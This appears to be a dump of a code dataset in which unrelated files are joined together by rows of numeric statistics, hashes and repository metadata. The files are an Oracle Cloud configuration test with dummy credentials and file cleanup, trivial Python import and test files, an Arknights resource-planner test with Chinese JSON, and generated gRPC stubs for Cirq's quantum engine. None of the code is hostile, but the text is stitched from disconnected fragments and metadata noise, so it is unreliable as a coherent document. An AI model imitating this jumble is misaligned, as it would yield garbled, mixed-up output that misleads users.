#@ Sixth configuration attempt, uses an existing KEY with password, NOT saving password
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "4");
testutil.expect_prompt("Please enter the number of an option listed above:", "3");
testutil.expect_prompt("Enter the location of the existing API key:", def_key_path);
testutil.expect_password("The selected API key requires a passphrase:", "MySamplePwd");
testutil.expect_prompt("Do you want to write your passphrase to the config file? [y/N]:", "y");
util.configure_oci('fifth')
print ("Key Path Exists: %s" % os.path.exists(key_path));
print ("Public Key Path Exists: %s" % os.path.exists(public_key_path));
with open(config_path, 'r') as file:
print(file.read())
#@ Cleanup
os.remove(config_path);
os.remove(def_key_path);
os.remove(def_public_key_path);
os.remove(key_path);
os.remove(public_key_path);
os.rmdir(oci_path);
| 55.553957
| 141
| 0.775188
| 1,107
| 7,722
| 5.268293
| 0.097561
| 0.122428
| 0.150892
| 0.124829
| 0.858025
| 0.844479
| 0.826989
| 0.819787
| 0.76869
| 0.748114
| 0
| 0.015722
| 0.102176
| 7,722
| 138
| 142
| 55.956522
| 0.825472
| 0.060995
| 0
| 0.5
| 0
| 0
| 0.536316
| 0.13187
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.13
| 0.01
| 0
| 0.01
| 0.17
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2faf8c67983d53e0b7c0b7e9ebc390ce6b0789f6
| 38
|
py
|
Python
|
test/pytch/py/project/just_import.py
|
Liampobob/pytch-vm
|
bb2cf19c0736d467daf195635a9de9903aaa1237
|
[
"MIT"
] | 2
|
2021-11-29T09:47:23.000Z
|
2022-02-11T15:48:20.000Z
|
test/pytch/py/project/just_import.py
|
Liampobob/pytch-vm
|
bb2cf19c0736d467daf195635a9de9903aaa1237
|
[
"MIT"
] | 1
|
2022-02-28T13:50:48.000Z
|
2022-02-28T13:50:48.000Z
|
test/pytch/py/project/just_import.py
|
Liampobob/pytch-vm
|
bb2cf19c0736d467daf195635a9de9903aaa1237
|
[
"MIT"
] | 4
|
2021-02-12T15:27:33.000Z
|
2022-03-16T10:26:55.000Z
|
import pytch.project as pytch_project
| 19
| 37
| 0.868421
| 6
| 38
| 5.333333
| 0.666667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 38
| 1
| 38
| 38
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ff66eabcbc6bb8c6ceb65a9a349fd09c8edcb917
| 34
|
py
|
Python
|
src/test/lexer_test.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 76
|
2020-04-03T01:21:47.000Z
|
2021-12-06T02:54:53.000Z
|
src/test/lexer_test.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 7
|
2020-04-06T04:44:10.000Z
|
2021-05-17T12:38:15.000Z
|
src/test/lexer_test.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 2
|
2020-10-23T10:25:16.000Z
|
2020-10-28T14:16:57.000Z
|
def test_lexer_import():
pass
| 11.333333
| 24
| 0.705882
| 5
| 34
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205882
| 34
| 2
| 25
| 17
| 0.814815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0.5
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
ff954804b7a748fb7a3c1c04afe1d494e15cb870
| 174
|
py
|
Python
|
awspider/__init__.py
|
wehriam/awspider
|
3d3dc40208fb334a6b6cdaae92f5d5ea07295616
|
[
"MIT"
] | 2
|
2016-05-09T14:59:51.000Z
|
2021-11-22T02:35:39.000Z
|
awspider/__init__.py
|
wehriam/awspider
|
3d3dc40208fb334a6b6cdaae92f5d5ea07295616
|
[
"MIT"
] | null | null | null |
awspider/__init__.py
|
wehriam/awspider
|
3d3dc40208fb334a6b6cdaae92f5d5ea07295616
|
[
"MIT"
] | 2
|
2022-02-27T19:55:42.000Z
|
2022-03-08T07:20:53.000Z
|
from .servers import DataServer
from .servers import ExecutionServer
from .servers import InterfaceServer
from .servers import AdminServer
from .plugin import AWSpiderPlugin
| 29
| 36
| 0.856322
| 20
| 174
| 7.45
| 0.45
| 0.295302
| 0.456376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114943
| 174
| 5
| 37
| 34.8
| 0.967532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ff9dbcf5891b9088f2e793195c40ff2f0a13b892
| 142
|
py
|
Python
|
backend-project/small_eod/administrative_units/factories.py
|
WlodzimierzKorza/small_eod
|
027022bd71122a949a2787d0fb86518df80e48cd
|
[
"MIT"
] | 64
|
2019-12-30T11:24:03.000Z
|
2021-06-24T01:04:56.000Z
|
backend-project/small_eod/administrative_units/factories.py
|
WlodzimierzKorza/small_eod
|
027022bd71122a949a2787d0fb86518df80e48cd
|
[
"MIT"
] | 465
|
2018-06-13T21:43:43.000Z
|
2022-01-04T23:33:56.000Z
|
backend-project/small_eod/administrative_units/factories.py
|
WlodzimierzKorza/small_eod
|
027022bd71122a949a2787d0fb86518df80e48cd
|
[
"MIT"
] | 72
|
2018-12-02T19:47:03.000Z
|
2022-01-04T22:54:49.000Z
|
from teryt_tree.factories import JednostkaAdministracyjnaFactory
class AdministrativeUnitFactory(JednostkaAdministracyjnaFactory):
pass
| 23.666667
| 65
| 0.880282
| 10
| 142
| 12.4
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091549
| 142
| 5
| 66
| 28.4
| 0.96124
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
44317a518ed048c70963e7ba74dcf82dd0f43095
| 1,788
|
py
|
Python
|
test/test_planner.py
|
cytopz/arknights-farmer
|
4140880b61a2fd08c0d2a5f51b1c8e9a65be6afc
|
[
"MIT"
] | 4
|
2020-09-09T10:43:21.000Z
|
2021-05-27T22:50:33.000Z
|
test/test_planner.py
|
rahagi/arknights-farmer
|
4140880b61a2fd08c0d2a5f51b1c8e9a65be6afc
|
[
"MIT"
] | null | null | null |
test/test_planner.py
|
rahagi/arknights-farmer
|
4140880b61a2fd08c0d2a5f51b1c8e9a65be6afc
|
[
"MIT"
] | null | null | null |
from arknights_farmer.penguin import planner
stri = """
[{"id":"30135","name":"D32钢","need":0,"have":0},{"id":"30125","name":"双极纳米片","need":0,"have":0},{"id":"30115","name":"聚合剂","need":4,"have":0},{"id":"30074","name":"白马醇","need":0,"have":0},{"id":"30073","name":"扭转醇","need":0,"have":0},{"id":"30084","name":"三水锰矿","need":0,"have":0},{"id":"30083","name":"轻锰矿","need":0,"have":0},{"id":"30094","name":"五水研磨石","need":0,"have":0},{"id":"30093","name":"研磨石","need":0,"have":0},{"id":"30104","name":"RMA70-24","need":0,"have":0},{"id":"30103","name":"RMA70-12","need":0,"have":0},{"id":"30014","name":"提纯源岩","need":0,"have":0},{"id":"30013","name":"固源岩组","need":30,"have":0},{"id":"30012","name":"固源岩","need":0,"have":0},{"id":"30011","name":"源岩","need":0,"have":0},{"id":"30064","name":"改量装置","need":0,"have":0},{"id":"30063","name":"全新装置","need":0,"have":0},{"id":"30062","name":"装置","need":0,"have":0},{"id":"30061","name":"破损装置","need":0,"have":0},{"id":"30034","name":"聚酸酯块","need":0,"have":0},{"id":"30033","name":"聚酸酯组","need":0,"have":0},{"id":"30032","name":"聚酸酯","need":0,"have":0},{"id":"30031","name":"酯原料","need":0,"have":0},{"id":"30024","name":"糖聚块","need":0,"have":0},{"id":"30023","name":"糖组","need":0,"have":0},{"id":"30022","name":"糖","need":0,"have":0},{"id":"30021","name":"代糖","need":0,"have":0},{"id":"30044","name":"异铁块","need":0,"have":0},{"id":"30043","name":"异铁组","need":0,"have":0},{"id":"30042","name":"异铁","need":0,"have":0},{"id":"30041","name":"异铁碎片","need":0,"have":0},{"id":"30054","name":"酮阵列","need":0,"have":0},{"id":"30053","name":"酮凝集组","need":0,"have":0},{"id":"30052","name":"酮凝集","need":0,"have":0},{"id":"30051","name":"双酮","need":0,"have":0}]
"""
print(planner.get_route(stri))
print({x['stage']: x['count'] for x in planner.get_route(stri)})
| 198.666667
| 1,629
| 0.541387
| 306
| 1,788
| 3.153595
| 0.303922
| 0.181347
| 0.246632
| 0.341969
| 0.397927
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144633
| 0.010067
| 1,788
| 8
| 1,630
| 223.5
| 0.400565
| 0
| 0
| 0
| 0
| 0.166667
| 0.917785
| 0.911074
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.333333
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4473e0a00ab55b6254ce60b636421e37dd381ab9
| 30,844
|
py
|
Python
|
cirq/google/engine/client/quantum_v1alpha1/proto/engine_pb2_grpc.py
|
exAClior/Cirq
|
0701327bc66c988428f302dd1e4bed1eef1535a6
|
[
"Apache-2.0"
] | 1
|
2021-01-05T19:47:55.000Z
|
2021-01-05T19:47:55.000Z
|
cirq/google/engine/client/quantum_v1alpha1/proto/engine_pb2_grpc.py
|
rohitvuppala/Cirq
|
0ff2894e053e4ce3bb1b54e9b9de1cc4345d10b3
|
[
"Apache-2.0"
] | 4
|
2021-01-11T10:35:37.000Z
|
2021-01-28T19:17:02.000Z
|
cirq/google/engine/client/quantum_v1alpha1/proto/engine_pb2_grpc.py
|
rohitvuppala/Cirq
|
0ff2894e053e4ce3bb1b54e9b9de1cc4345d10b3
|
[
"Apache-2.0"
] | 1
|
2021-12-30T21:50:00.000Z
|
2021-12-30T21:50:00.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from cirq.google.engine.client.quantum_v1alpha1.proto import (
engine_pb2 as google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2,
)
from cirq.google.engine.client.quantum_v1alpha1.proto import (
quantum_pb2 as google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2,
)
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class QuantumEngineServiceStub(object):
"""-
-
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateQuantumProgram = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CreateQuantumProgram',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumProgramRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.FromString,
)
self.GetQuantumProgram = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumProgram',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumProgramRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.FromString,
)
self.ListQuantumPrograms = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumPrograms',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProgramsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProgramsResponse.FromString,
)
self.DeleteQuantumProgram = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/DeleteQuantumProgram',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumProgramRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.UpdateQuantumProgram = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/UpdateQuantumProgram',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumProgramRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.FromString,
)
self.CreateQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CreateQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.FromString,
)
self.GetQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.FromString,
)
self.ListQuantumJobs = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumJobs',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobsResponse.FromString,
)
self.DeleteQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/DeleteQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.UpdateQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/UpdateQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.FromString,
)
self.CancelQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CancelQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CancelQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.ListQuantumJobEvents = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumJobEvents',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobEventsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobEventsResponse.FromString,
)
self.GetQuantumResult = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumResult',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumResultRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumResult.FromString,
)
self.ListQuantumProcessors = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumProcessors',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProcessorsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProcessorsResponse.FromString,
)
self.GetQuantumProcessor = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumProcessor',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumProcessorRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProcessor.FromString,
)
self.ListQuantumCalibrations = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumCalibrations',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumCalibrationsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumCalibrationsResponse.FromString,
)
self.GetQuantumCalibration = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumCalibration',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumCalibrationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumCalibration.FromString,
)
self.CreateQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CreateQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.FromString,
)
self.CancelQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CancelQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CancelQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.FromString,
)
self.DeleteQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/DeleteQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GetQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.FromString,
)
self.ListQuantumReservations = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumReservations',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationsResponse.FromString,
)
self.UpdateQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/UpdateQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.FromString,
)
self.QuantumRunStream = channel.stream_stream(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/QuantumRunStream',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.QuantumRunStreamRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.QuantumRunStreamResponse.FromString,
)
self.ListQuantumReservationGrants = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumReservationGrants',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationGrantsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationGrantsResponse.FromString,
)
self.ReallocateQuantumReservationGrant = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ReallocateQuantumReservationGrant',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ReallocateQuantumReservationGrantRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservationGrant.FromString,
)
self.ListQuantumReservationBudgets = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumReservationBudgets',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationBudgetsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationBudgetsResponse.FromString,
)
self.ListQuantumTimeSlots = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumTimeSlots',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumTimeSlotsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumTimeSlotsResponse.FromString,
)
class QuantumEngineServiceServicer(object):
"""-
-
"""
def CreateQuantumProgram(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumProgram(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumPrograms(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteQuantumProgram(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateQuantumProgram(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumJobs(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CancelQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumJobEvents(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumResult(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumProcessors(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumProcessor(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumCalibrations(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumCalibration(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CancelQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumReservations(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def QuantumRunStream(self, request_iterator, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumReservationGrants(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ReallocateQuantumReservationGrant(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumReservationBudgets(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumTimeSlots(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_QuantumEngineServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'CreateQuantumProgram': grpc.unary_unary_rpc_method_handler(
servicer.CreateQuantumProgram,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumProgramRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.SerializeToString,
),
'GetQuantumProgram': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumProgram,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumProgramRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.SerializeToString,
),
'ListQuantumPrograms': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumPrograms,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProgramsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProgramsResponse.SerializeToString,
),
